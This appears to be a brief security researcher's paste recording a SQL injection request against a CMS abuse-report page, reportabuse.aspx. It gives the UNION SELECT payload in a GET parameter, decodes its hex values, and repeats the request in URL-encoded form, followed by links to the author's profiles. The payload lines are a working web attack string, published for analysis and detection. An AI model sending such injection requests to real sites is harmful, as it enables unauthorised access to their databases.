reportabuse.aspx sqli

1. SQL Injection
2. *******
3.  
4. GET/cmsmodules/abusereport/cmspages/reportabuse.aspx?params=xxxxx' union select 0x5e252a,0x5e252a,0x5e252a,0x5e252a,0x5e252a,0x5e252a,0x5e252a,0x5e252a --
5.  
6.  
7. HEX to ASCII
8. 0x5e252a = ^%*
9.  
10.  
11. GET/cmsmodules/abusereport/cmspages/reportabuse.aspx?params=xxxxx'+union+select+^%*,^%*,^%*,^%*,^%*,^%*,^%*,^%*,^%*,^%*+--+
12.  
13. *******
14. *******
15. *******
16. More FROM @neonprimetime security
17.  
18. http://pastebin.com/u/Neonprimetime
19. https://www.virustotal.com/en/USER/neonprimetime/
20. https://twitter.com/neonprimetime
21. https://www.reddit.com/USER/neonprimetime